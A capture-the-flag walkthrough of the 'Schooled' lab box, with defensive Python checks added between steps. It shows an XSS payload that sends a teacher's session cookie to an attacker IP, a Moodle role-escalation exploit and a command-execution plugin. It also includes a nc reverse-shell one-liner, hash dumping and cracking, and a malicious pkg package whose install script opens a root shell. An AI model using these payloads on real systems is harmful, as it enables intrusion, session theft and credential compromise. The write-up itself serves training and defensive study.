Schooled

Posted on Sep 13, 2021

We start with an nmap scan:

```
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-03 15:27 EDT
Nmap scan report for 10.10.10.234
Host is up (0.077s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey: 
|   2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
|   256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
|_  256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
80/tcp open  http    Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.53 seconds
```

The website lists a contact address, admissions@schooled.htb, which gives us the domain to use for virtual host fuzzing:

```
└─$ ffuf -H "Host: FUZZ.schooled.htb" -u http://10.10.10.234 -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -fw 5338

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.234
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.schooled.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response words: 5338
________________________________________________

moodle                  [Status: 200, Size: 84, Words: 5, Lines: 2]
```

Searching for default Moodle credentials gives us admin:admin. Unfortunately, these don't work.

You can log in as a guest, which shows the available courses and the teacher holding each course.

Which gives us the following teachers:

manuel.phillips
jane.higgins
jamie.borham
lianne.carter

We register as a student and enter the platform. The online users list shows only two: myself and Manuel Phillips.

Looking at the announcements, it appears the teacher manually removes inactive students, which suggests he visits student profiles. That points to us perhaps being able to steal a cookie or similar.

First I set my MoodleNet profile field to an img tag pointing at my box, to see whether anyone loads it:

```
<img src="http://10.10.16.65/bad">
```

Let's see if we can steal his cookie.

With reference to IppSec, we build the following payload:

```
<img src="/deh00ni" onerror="document.location.replace('http://10.10.16.65/cookiehere.png' + document.cookie);">
```

We get his cookie:

```
john: 3134be6pc3qacues0tfa7hpmr2 /cookiehere.pngMoodleSession=kgrm9n5s6ugi94pa57tv38gbuq
```

The callback on our listener looks like this:

```
└─$ sudo nc -nvlp 80
[sudo] password for bob: 
listening on [any] 80 ...
connect to [10.10.16.65] from (UNKNOWN) [10.10.10.234] 55492
GET /MoodleSession=17v6r2k5esor5rc20tbdv8sdv7 HTTP/1.1
Host: 10.10.16.65
User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://moodle.schooled.htb/moodle/user/profile.php?id=28
Upgrade-Insecure-Requests: 1
```
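From the defender's side, two checks bear directly on this step: the payload only works because the MoodleSession cookie is readable from JavaScript (no HttpOnly flag), and only because the profile field stores an img tag with an onerror handler unescaped. The script below is an added example written for this writeup, not code from the original post or from Moodle; the Set-Cookie headers and profile HTML it scans are constructed samples, and the cookie name it treats as a session cookie is an assumption.

```python
"""Added example for this writeup (not from the original post or from Moodle).

Two defender-side checks on the cookie-theft step above:
  1. audit Set-Cookie headers: a session cookie without HttpOnly is readable
     through document.cookie, which is exactly what the onerror payload relies on;
  2. scan stored profile HTML for inline on* event handlers (onerror, onload, ...).
Cookie names, sample headers and sample HTML below are constructed assumptions.
"""
import re

# Constructed sample response headers (assumption: shape of a Moodle login response).
SAMPLE_HEADERS = [
    "Set-Cookie: MoodleSession=EXAMPLESESSIONVALUE; path=/moodle/",
    "Set-Cookie: MOODLEID1_=%25F3; expires=Fri, 31-Dec-2021 00:00:00 GMT; path=/; HttpOnly",
]

# Constructed profile HTML mirroring the shape of the payload in the post.
SAMPLE_PROFILE_HTML = (
    "<p>Hello</p>"
    "<img src=\"/deh00ni\" onerror=\"document.location.replace("
    "'http://203.0.113.5/' + document.cookie);\">"
)

SESSION_COOKIE_NAMES = {"moodlesession"}          # assumption: the cookie worth protecting
EVENT_HANDLER_RE = re.compile(r"<[^>]*\son[a-z]+\s*=", re.IGNORECASE)


def parse_set_cookie(line):
    """Return (name, {lowercase attribute names}) for one Set-Cookie header line."""
    raw = line.split(":", 1)[1].strip()
    parts = [p.strip() for p in raw.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:] if p}
    return name, attrs


def audit_set_cookie(header_lines):
    """Map each cookie name to the list of protective flags it is missing."""
    findings = {}
    for line in header_lines:
        if not line.lower().startswith("set-cookie:"):
            continue
        name, attrs = parse_set_cookie(line)
        missing = [flag for flag, key in (("HttpOnly", "httponly"),
                                          ("Secure", "secure"),
                                          ("SameSite", "samesite"))
                   if key not in attrs]
        if missing:
            findings[name] = missing
    return findings


def session_cookie_exposed(header_lines):
    """True if a session cookie can be read from JavaScript (no HttpOnly)."""
    findings = audit_set_cookie(header_lines)
    return any(name.lower() in SESSION_COOKIE_NAMES and "HttpOnly" in missing
               for name, missing in findings.items())


def find_event_handlers(html):
    """Return the opening tags in html that carry an inline on* handler attribute."""
    return [m.group(0) for m in EVENT_HANDLER_RE.finditer(html)]


if __name__ == "__main__":
    print("cookie findings:", audit_set_cookie(SAMPLE_HEADERS))
    print("session readable from JS:", session_cookie_exposed(SAMPLE_HEADERS))
    print("inline handlers:", find_event_handlers(SAMPLE_PROFILE_HTML))
```

Run against a real response, `audit_set_cookie` takes the raw header lines from the login response; Moodle exposes the two relevant switches as `$CFG->cookiehttponly` and `$CFG->cookiesecure`. The handler scan is a coarse triage filter for stored profile fields, not an HTML sanitiser: it will also match harmless text such as `<span data-onx=` inside a tag, so treat hits as candidates to review rather than verdicts.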

This Stack Overflow post shows how we can get the version number of a Moodle install by backing up a course.

We create a backup, download it locally and extract the contents:

```
┌──(bob㉿kali)-[~/htb/schooled]
└─$ tar zxvf backup-moodle2-course-5-maths-20210404-2334-nu.mbz
```

And the extracted backup gives us the build version.

Searching for that version, we find CVE-2020-14321, which lets a course teacher assign themselves the Manager role within a course.

With the stolen teacher session, we enrol Lianne Carter and intercept the request:

![[20210405021917.png]]

And we change

```
userlist%5B%5D=25&roletoassign=5
```

to `userlist%5B%5D=24` to reference Maurice, and change `roletoassign=5` to `roletoassign=1` to assign ourselves the 'Manager' role.

Then we change back to `userlist%5B%5D=25&roletoassign=5` to assign Lianne as 'Student', and change the role to 1 again to make her 'Manager' too.
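A detection for this privilege-escalation pattern, as an added example that is not from the original post or from Moodle: a Manager role (role id 1 on a default install) assigned inside a course context (context level 50) by an account that is not a site admin, and in particular granted to the grantor themselves. It rebuilds the minimal columns of Moodle's mdl_context and mdl_role_assignments tables in SQLite with constructed rows; ADMIN_IDS stands in for `$CFG->siteadmins`.

```python
"""Added example for this writeup (not from the original post or from Moodle).

Detection for the role-assignment pattern used above: a Manager role granted
inside a *course* context by an account that is not a site admin. Uses a minimal
copy of the columns of mdl_context and mdl_role_assignments in SQLite; the rows,
ids and timestamps are constructed, and ADMIN_IDS stands in for $CFG->siteadmins.
"""
import sqlite3

CONTEXT_SYSTEM = 10      # Moodle context levels (site and course)
CONTEXT_COURSE = 50
ROLE_MANAGER = 1         # default role ids on a standard install
ROLE_STUDENT = 5

SCHEMA = """
CREATE TABLE mdl_context (id INTEGER PRIMARY KEY, contextlevel INTEGER, instanceid INTEGER);
CREATE TABLE mdl_role_assignments (
    id INTEGER PRIMARY KEY, roleid INTEGER, contextid INTEGER,
    userid INTEGER, timemodified INTEGER, modifierid INTEGER);
"""

# Constructed data: context 1 is the site, context 7 is course id 5.
CONTEXTS = [(1, CONTEXT_SYSTEM, 0), (7, CONTEXT_COURSE, 5)]
ASSIGNMENTS = [
    # id, roleid, contextid, userid, timemodified, modifierid
    (1, ROLE_STUDENT, 7, 25, 1617580000, 24),  # teacher 24 enrols student 25: normal
    (2, ROLE_MANAGER, 7, 24, 1617580100, 24),  # teacher grants *themselves* Manager
    (3, ROLE_MANAGER, 7, 25, 1617580200, 24),  # teacher grants a student Manager
    (4, ROLE_MANAGER, 1, 2, 1608320129, 2),    # admin is Manager at site level: expected
]
ADMIN_IDS = {2}          # would come from $CFG->siteadmins on a real install

QUERY = """
SELECT ra.id, ra.userid, ra.modifierid, ctx.instanceid, ra.timemodified
FROM mdl_role_assignments ra
JOIN mdl_context ctx ON ctx.id = ra.contextid
WHERE ra.roleid = ? AND ctx.contextlevel = ?
ORDER BY ra.id
"""


def build_db():
    """In-memory database seeded with the constructed rows above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO mdl_context VALUES (?, ?, ?)", CONTEXTS)
    conn.executemany("INSERT INTO mdl_role_assignments VALUES (?, ?, ?, ?, ?, ?)", ASSIGNMENTS)
    return conn


def suspicious_manager_assignments(conn, admin_ids=ADMIN_IDS):
    """Manager roles in a course context not granted by a site admin.

    Each finding records who got the role, who granted it, the course id and
    whether the grantor gave the role to themselves (the CVE-2020-14321 shape).
    """
    rows = conn.execute(QUERY, (ROLE_MANAGER, CONTEXT_COURSE)).fetchall()
    return [
        {"assignment": ra_id, "user": userid, "by": modifierid,
         "course": courseid, "time": when, "self_grant": userid == modifierid}
        for ra_id, userid, modifierid, courseid, when in rows
        if modifierid not in admin_ids
    ]


if __name__ == "__main__":
    for finding in suspicious_manager_assignments(build_db()):
        print(finding)
```

On a real install the same QUERY runs unchanged against MySQL, and the two flagged rows correspond to the two requests replayed above (self-grant first, then the second account). Upgrading past the fixed releases (3.9.1, 3.8.4, 3.7.7, 3.5.13) removes the bug; the query is still useful afterwards as a periodic check that no course-level Manager grants have been left behind.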

We install the plugin from here.

We enumerate the folders and check the config through the plugin's cmd parameter:

```
http://moodle.schooled.htb/moodle/blocks/rce/lang/en/block_rce.php?cmd=cat%20../../../../config.php
```

```
$CFG->dbtype = 'mysqli';
$CFG->dblibrary = 'native';
$CFG->dbhost = 'localhost';
$CFG->dbname = 'moodle';
$CFG->dbuser = 'moodle';
$CFG->dbpass = 'PlaybookMaster2020';
$CFG->prefix = 'mdl_';
$CFG->dboptions = array (
  'dbpersist' => 0,
  'dbport' => 3306,
  'dbsocket' => '',
  'dbcollation' => 'utf8_unicode_ci',
);
$CFG->wwwroot = 'http://moodle.schooled.htb/moodle';
$CFG->dataroot = '/usr/local/www/apache24/moodledata';
$CFG->admin = 'admin';
$CFG->directorypermissions = 0777;

require_once(__DIR__ . '/lib/setup.php');

// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!
```

Working notes: the current session cookie, and the database credentials from config.php:

```
/cookiehere.pngMoodleSession=vav2c5tmuh55pfiriqthpr99rb
sql moodle:PlaybookMaster2020
```

The same plugin gives us a reverse shell:

```
blocks/rce/lang/en/block_rce.php?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.65 9001 >/tmp/f
```

We get a shell as www-data.

We then start to enumerate the database:

```
$ /usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -e"show databases;"
mysql: [Warning] Using a password on the command line interface can be insecure.
Database
information_schema
moodle
$ 
```

We then dump the user table to get the password hashes:

```
/usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -e"use moodle; select * from mdl_user;"
mysql: [Warning] Using a password on the command line interface can be insecure.
```

The relevant columns of the output:

| id | username | password | firstname | lastname | email |
|---|---|---|---|---|---|
| 1 | guest | $2y$10$u8DkSWjhZnQhBk1a0g1ug.x79uhkx/sa7euU8TI4FX4TCaXK6uQk2 | Guest user | | root@localhost |
| 2 | admin | $2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW | Jamie | Borham | jamie@staff.schooled.htb |
| 3 | bell_oliver89 | $2y$10$N0feGGafBvl.g6LNBKXPVOpkvs8y/axSPyXb46HiFP3C9c42dhvgK | Oliver | Bell | bell_oliver89@student.schooled.htb |
| 4 | orchid_sheila89 | $2y$10$YMsy0e4x4vKq7HxMsDk.OehnmAcc8tFa0lzj5b1Zc8IhqZx03aryC | Sheila | Orchid | orchid_sheila89@student.schooled.htb |
| 5 | chard_ellzabeth89 | $2y$10$D0Hu9XehYbTxNsf/uZrxXeRp/6pmT1/6A.Q2CZhbR26lCPtf68wUC | Elizabeth | Chard | chard_elizabeth89@student.schooled.htb |
| 6 | morris_jake89 | $2y$10$UieCKjut2IMiglWqRCkSzerF.8AnR8NtOLFmDUcQa90lair7LndRy | Jake | Morris | morris_jake89@student.schooled.htb |
| 7 | heel_james89 | $2y$10$sjk.jJKsfnLG4r5rYytMge4sJWj4ZY8xeWRIrepPJ8oWlynRc9Eim | James | Heel | heel_james89@student.schooled.htb |
| 8 | nash_michael89 | $2y$10$yShrS/zCD1Uoy0JMZPCDB.saWGsPUrPyQZ4eAS50jGZUp8zsqF8tu | Michael | Nash | nash_michael89@student.schooled.htb |
| 9 | singh_rakesh89 | $2y$10$Yd52KrjMGJwPUeDQRU7wNu6xjTMobTWq3eEzMWeA2KsfAPAcHSUPu | Rakesh | Singh | singh_rakesh89@student.schooled.htb |
| 10 | taint_marcus89 | $2y$10$kFO4L15Elng2Z2R4cCkbdOHyh5rKwnG4csQ0gWUeu2bJGt4Mxswoa | Marcus | Taint | taint_marcus89@student.schooled.htb |
| 11 | walls_shaun89 | $2y$10$EDXwQZ9Dp6UNHjAF.ZXY2uKV5NBjNBiLx/WnwHiQ87Dk90yZHf3ga | Shaun | Walls | walls_shaun89@student.schooled.htb |
| 12 | smith_john89 | $2y$10$YRdwHxfstP0on0Yzd2jkNe/YE/9PDv/YC2aVtC97mz5RZnqsZ/5Em | John | Smith | smith_john89@student.schooled.htb |
| 13 | white_jack89 | $2y$10$PRy8LErZpSKT7YuSxlWntOWK/5LmSEPYLafDd13Nv36MxlT5yOZqK | Jack | White | white_jack89@student.schooled.htb |
| 14 | travis_carl89 | $2y$10$VO/MiMUhZGoZmWiY7jQxz.Gu8xeThHXCczYB0nYsZr7J5PZ95gj9S | Carl | Travis | travis_carl89@student.schooled.htb |
| 15 | mac_amy89 | $2y$10$PgOU/KKquLGxowyzPCUsi.QRTUIrPETU7q1DEDv2Dt.xAjPlTGK3i | Amy | Mac | mac_amy89@student.schooled.htb |
| 16 | james_boris89 | $2y$10$N4hGccQNNM9oWJOm2uy1LuN50EtVcba/1MgsQ9P/hcwErzAYUtzWq | Boris | James | james_boris89@student.schooled.htb |
| 17 | pierce_allan | $2y$10$ia9fKz9.arKUUBbaGo2FM.b7n/QU1WDAFRafgD6j7uXtzQxLyR3Zy | Allan | Pierce | pierce_allan89@student.schooled.htb |
| 18 | henry_william89 | $2y$10$qj67d57dL/XzjCgE0qD1i.ION66fK0TgwCFou9yT6jbR7pFRXHmIu | William | Henry | henry_william89@student.schooled.htb |
| 19 | harper_zoe89 | $2y$10$mnYTPvYjDwQtQuZ9etlFmeiuIqTiYxVYkmruFIh4rWFkC3V1Y0zPy | Zoe | Harper | harper_zoe89@student.schooled.htb |

[...] snip

Going over to a box with a better GPU, we crack the hash of Jamie (the admin account):

```
λ hashcat -m 3200 ntlm.txt rockyou.txt
hashcat (v6.1.1) starting...

* Device #1: CUDA SDK Toolkit installation NOT detected.
             CUDA SDK Toolkit installation required for proper device support and utilization
             Falling back to OpenCL Runtime

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL API (OpenCL 1.2 CUDA 11.2.66) - Platform #1 [NVIDIA Corporation]
=======================================================================
* Device #1: GeForce RTX 3060 Ti, 7104/8192 MB (2048 MB allocatable), 38MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 178 MB

Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 1 sec

Cracking performance lower than expected?

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

$2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW:!QAZ2wsx

Session..........: hashcat
Status...........: Cracked
Hash.Name........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: $2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5G...l4qTiW
Time.Started.....: Mon Apr 05 22:06:41 2021 (13 secs)
Time.Estimated...: Mon Apr 05 22:06:54 2021 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     1188 H/s (4.94ms) @ Accel:4 Loops:4 Thr:11 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 15048/14344384 (0.10%)
Rejected.........: 0/15048 (0.00%)
Restore.Point....: 13376/14344384 (0.09%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1020-1024
Candidates.#1....: hakunamatata -> zazaza
Hardware.Mon.#1..: Temp: 55c Fan:  0% Util: 98% Core:2010MHz Mem:6800MHz Bus:16

Started: Mon Apr 05 22:06:31 2021
```

```
jamie:!QAZ2wsx
```

With jamie's credentials we can SSH to the box and get the user flag.

Running sudo -l shows a potential path to root:

```
jamie@Schooled:~ $ sudo -l
User jamie may run the following commands on Schooled:
    (ALL) NOPASSWD: /usr/sbin/pkg update
    (ALL) NOPASSWD: /usr/sbin/pkg install *
jamie@Schooled:~ $ 
```

Since pkg runs a package's install scripts as root and the wildcard lets us install any package file we choose, we need to create a malicious pkg file.

After some googling we find this and follow the instructions.

Our exploit script ends up looking as follows:


```
#!/bin/sh

STAGEDIR=/tmp/stage
rm -rf ${STAGEDIR}
mkdir -p ${STAGEDIR}

cat >> ${STAGEDIR}/+PRE_DEINSTALL <<EOF
# careful here, this may clobber your system
echo "Resetting root shell"
pw usermod -n root -s /bin/csh
EOF

cat >> ${STAGEDIR}/+POST_INSTALL <<EOF
# careful here, this may clobber your system
echo "Registering root shell"
pw usermod -n root -s /bin/sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.65 9001 >/tmp/f
EOF

cat >> ${STAGEDIR}/+MANIFEST <<EOF
name: mypackage
version: "1.0_5"
origin: sysutils/mypackage
comment: "automates stuff"
desc: "automates tasks which can also be undone later"
maintainer: john@doe.it
www: https://doe.it
prefix: /
EOF

mkdir -p ${STAGEDIR}/usr/local/etc
echo "# hello world" > ${STAGEDIR}/usr/local/etc/my.conf
echo "/usr/local/etc/my.conf" > ${STAGEDIR}/plist

pkg create -m ${STAGEDIR}/ -r ${STAGEDIR}/ -p ${STAGEDIR}/plist -o .
```

We start our listener and then install the pkg with:

```
jamie@Schooled:~ $ sudo pkg install --no-repo-update *.txz
```

Rooted!
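Two checks an administrator would want around this sudo rule, as an added example that is not from the original post or from FreeBSD's pkg: flag `sudo -l` entries that hand a package manager a wildcard argument without a password, and list the install/deinstall hooks inside a package file before it is installed, since pkg runs those as root. The `sudo -l` text is a constructed copy of the output shown above, the package archive is built in a temporary directory from constructed members, and the assumed layout (a tar.xz with `+MANIFEST` and `+SCRIPT` members at the root) follows the stage directory the `pkg create` script above builds.

```python
"""Added example for this writeup (not from the original post or from FreeBSD pkg).

Two checks a defender would want around the sudo rule above:
  1. parse `sudo -l` output for NOPASSWD rules that hand a package manager a
     wildcard argument (installing a package runs its scripts as root);
  2. list the install/deinstall scripts inside a .txz package before installing it.
The sudo output and the package archive below are constructed; the assumption
about the package layout (a tar.xz with +MANIFEST and +SCRIPT members at the root)
follows the stage directory built by the pkg create command in the post.
"""
import io
import os
import re
import tarfile
import tempfile

# Constructed copy of the sudo -l output format shown above, plus one harmless rule.
SAMPLE_SUDO_L = """User jamie may run the following commands on Schooled:
    (ALL) NOPASSWD: /usr/sbin/pkg update
    (ALL) NOPASSWD: /usr/sbin/pkg install *
    (root) /usr/bin/less /var/log/messages
"""

PACKAGE_MANAGERS = {"pkg", "apt", "apt-get", "dpkg", "yum", "dnf", "rpm", "pip", "npm"}
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")
SCRIPT_MEMBERS = {"+PRE_INSTALL", "+POST_INSTALL", "+INSTALL",
                  "+PRE_DEINSTALL", "+POST_DEINSTALL", "+DEINSTALL"}
MANIFEST_SCRIPT_KEYS = ("pre-install", "post-install", "pre-deinstall", "post-deinstall")


def risky_sudo_rules(sudo_l_output):
    """Commands runnable without a password that give a package manager a wildcard."""
    risky = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        cmd = m.group("cmd").strip()
        binary = os.path.basename(cmd.split()[0])
        if "NOPASSWD:" in m.group("tags") and "*" in cmd and binary in PACKAGE_MANAGERS:
            risky.append(cmd)
    return risky


def package_scripts(path):
    """Names of script hooks a package would run on install/deinstall.

    Looks for +SCRIPT members and for script keys inside +MANIFEST (pkg can carry
    scripts either way; which one a given pkg version emits is not checked here).
    """
    found = set()
    with tarfile.open(path, "r:xz") as tar:
        for member in tar.getmembers():
            name = member.name.lstrip("./")
            if name in SCRIPT_MEMBERS:
                found.add(name)
            elif name == "+MANIFEST":
                text = tar.extractfile(member).read().decode("utf-8", "replace")
                for key in MANIFEST_SCRIPT_KEYS:
                    if re.search(r"\b%s\b" % re.escape(key), text):
                        found.add("manifest:" + key)
    return sorted(found)


def build_sample_package(directory):
    """Write a constructed package archive (manifest, one file, one root-run script)."""
    path = os.path.join(directory, "mypackage-1.0_5.txz")
    members = {
        "+MANIFEST": b'name: mypackage\nversion: "1.0_5"\nprefix: /\n',
        "+POST_INSTALL": b'echo "this runs as root during pkg install"\n',
        "usr/local/etc/my.conf": b"# hello world\n",
    }
    with tarfile.open(path, "w:xz") as tar:
        for name, data in members.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return path


def inspect_constructed_package():
    """Build the sample package in a temp dir and return the scripts it carries."""
    with tempfile.TemporaryDirectory() as tmp:
        return package_scripts(build_sample_package(tmp))


if __name__ == "__main__":
    print("risky sudo rules:", risky_sudo_rules(SAMPLE_SUDO_L))
    print("scripts in sample package:", inspect_constructed_package())
```

The sudo check deliberately treats `pkg update` as acceptable and only flags `pkg install *`: the wildcard is what turns a package-maintenance rule into arbitrary root code execution, and the fix is to drop the wildcard or to restrict the rule to a named repository rather than a local file. The package check is the pre-installation review that rule skips.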